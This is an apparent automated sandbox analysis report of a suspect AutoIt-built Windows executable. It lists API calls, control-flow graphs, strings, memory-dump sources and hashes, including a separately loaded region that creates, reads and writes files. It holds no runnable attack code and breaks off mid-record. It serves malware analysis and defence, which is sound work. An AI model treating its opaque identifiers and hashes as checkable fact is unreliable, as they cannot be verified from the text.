                                                                                        control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2079 401144-40114a 2077->2079 2080 40111b-40111e 2077->2080 2078->2077 2081 401182 2078->2081 2083 401184-40118e call 401250 2079->2083 2084 40114c-40114f 2079->2084 2080->2079 2082 401120-401126 2080->2082 2085 40112c-401141 DefWindowProcW 2081->2085 2082->2085 2086 42b038-42b03f 2082->2086 2095 401193-40119a 2083->2095 2087 401151-401157 2084->2087 2088 40119d 2084->2088 2086->2085 2094 42b045-42b059 call 401000 call 40e0c0 2086->2094 2092 401219-40121f 2087->2092 2093 40115d 2087->2093 2090 4011a3-4011a9 2088->2090 2091 42afb4-42afc5 call 40f190 2088->2091 2090->2082 2096 4011af 2090->2096 2091->2095 2092->2082 2099 401225-42b06d call 468b0e 2092->2099 2097 401163-401166 2093->2097 2098 42b01d-42b024 2093->2098 2094->2085 2096->2082 2102 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2096->2102 2103 4011db-401202 SetTimer RegisterWindowMessageW 2096->2103 2105 42afe9-42b018 call 40f190 call 401a50 2097->2105 2106 40116c-401172 2097->2106 2098->2085 2104 42b02a-42b033 call 4370f4 2098->2104 2099->2095 2103->2095 2113 401204-401216 CreatePopupMenu 2103->2113 2104->2085 2105->2085 2106->2082 2115 401174-42afde call 45fd57 2106->2115 2115->2085 2127 42afe4 2115->2127 2127->2095
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                        • CreatePopupMenu.USER32 ref: 00401204
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303
                                                                                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 004115F1
                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                        • std::exception::exception.LIBCMT ref: 00411626
                                                                                        • std::exception::exception.LIBCMT ref: 00411640
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                        • String ID: ,*H$4*H$@fI
                                                                                        • API String ID: 615853336-1459471987
                                                                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2147 3dbb358-3dbb3aa call 3dbb258 CreateFileW 2150 3dbb3ac-3dbb3ae 2147->2150 2151 3dbb3b3-3dbb3c0 2147->2151 2152 3dbb50c-3dbb510 2150->2152 2154 3dbb3d3-3dbb3ea VirtualAlloc 2151->2154 2155 3dbb3c2-3dbb3ce 2151->2155 2156 3dbb3ec-3dbb3ee 2154->2156 2157 3dbb3f3-3dbb419 CreateFileW 2154->2157 2155->2152 2156->2152 2158 3dbb41b-3dbb438 2157->2158 2159 3dbb43d-3dbb457 ReadFile 2157->2159 2158->2152 2161 3dbb47b-3dbb47f 2159->2161 2162 3dbb459-3dbb476 2159->2162 2164 3dbb481-3dbb49e 2161->2164 2165 3dbb4a0-3dbb4b7 WriteFile 2161->2165 2162->2152 2164->2152 2166 3dbb4b9-3dbb4e0 2165->2166 2167 3dbb4e2-3dbb507 CloseHandle VirtualFree 2165->2167 2166->2152 2167->2152
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03DBB39D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1495454385.0000000003DBA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DBA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_3dba000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                        • Instruction ID: 26bf21814d7450e41a9c56d5330c6cc1e6e83851051435e927a8749557b42799
                                                                                        • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                        • Instruction Fuzzy Hash: A551E875A50208FBEB20DFA4CC49FDE77B8BF48701F508559F64AEA280DAB49644CB60

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2177 401250-40125c 2178 401262-401293 call 412f40 call 401b80 2177->2178 2179 4012e8-4012ed 2177->2179 2184 4012d1-4012e2 KillTimer SetTimer 2178->2184 2185 401295-4012b5 2178->2185 2184->2179 2186 4012bb-4012bf 2185->2186 2187 4272ec-4272f2 2185->2187 2190 4012c5-4012cb 2186->2190 2191 42733f-427346 2186->2191 2188 4272f4-427315 Shell_NotifyIconW 2187->2188 2189 42731a-42733a Shell_NotifyIconW 2187->2189 2188->2184 2189->2184 2190->2184 2194 427393-4273b4 Shell_NotifyIconW 2190->2194 2192 427348-427369 Shell_NotifyIconW 2191->2192 2193 42736e-42738e Shell_NotifyIconW 2191->2193 2192->2184 2193->2184 2194->2184
                                                                                        APIs
                                                                                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                        • String ID:
                                                                                        • API String ID: 3300667738-0
                                                                                        • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                        • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2195 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2198 427190-4271ae RegQueryValueExW 2195->2198 2199 40e4eb-40e4f0 2195->2199 2200 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2198->2200 2201 42721a-42722a RegCloseKey 2198->2201 2206 427210-427219 call 436508 2200->2206 2207 4271f7-42720e call 402160 2200->2207 2206->2201 2207->2206
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                        • API String ID: 1586453840-614718249
                                                                                        • Opcode ID: 1d27a7508ccdfe51d261e4be39e615bcb39a538e4c620ec5280d8b0efb731e35
                                                                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                        • Opcode Fuzzy Hash: 1d27a7508ccdfe51d261e4be39e615bcb39a538e4c620ec5280d8b0efb731e35
                                                                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Copy$ClearErrorLast
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 2487901850-572801152
                                                                                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                        APIs
                                                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                        • _wcsncpy.LIBCMT ref: 00401C41
                                                                                        • _wcscpy.LIBCMT ref: 00401C5D
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                        • String ID: Line:
                                                                                        • API String ID: 1874344091-1585850449
                                                                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$OpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 1607946009-824357125
                                                                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                        APIs
                                                                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                        • _wcsncpy.LIBCMT ref: 004102ED
                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                        • _wcsncpy.LIBCMT ref: 00410340
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                        • String ID:
                                                                                        • API String ID: 3170942423-0
                                                                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Wu
                                                                                        • API String ID: 0-4083010176
                                                                                        • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                        • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                        APIs
                                                                                          • Part of subcall function 03DBCCE8: Sleep.KERNELBASE(000001F4), ref: 03DBCCF9
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03DBCF55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1495454385.0000000003DBA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DBA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_3dba000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: 2UFURBEI65UPARTOHN4WAN
                                                                                        • API String ID: 2694422964-94477642
                                                                                        • Opcode ID: 243d3604f7b5361f402270fde9f9b39ebfe746616354303535b2e13ee8a4a1fb
                                                                                        • Instruction ID: 56bebbe838b344991324604c6b34218616983c230a24a06369315511b60c9da1
                                                                                        • Opcode Fuzzy Hash: 243d3604f7b5361f402270fde9f9b39ebfe746616354303535b2e13ee8a4a1fb
                                                                                        • Instruction Fuzzy Hash: 3361A130D14288DBEF11DBB4D844BEEBB79AF19700F044199E249BB2C0D7BA5B85CB65
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentTerminate
                                                                                        • String ID: Wu
                                                                                        • API String ID: 2429186680-4083010176
                                                                                        • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
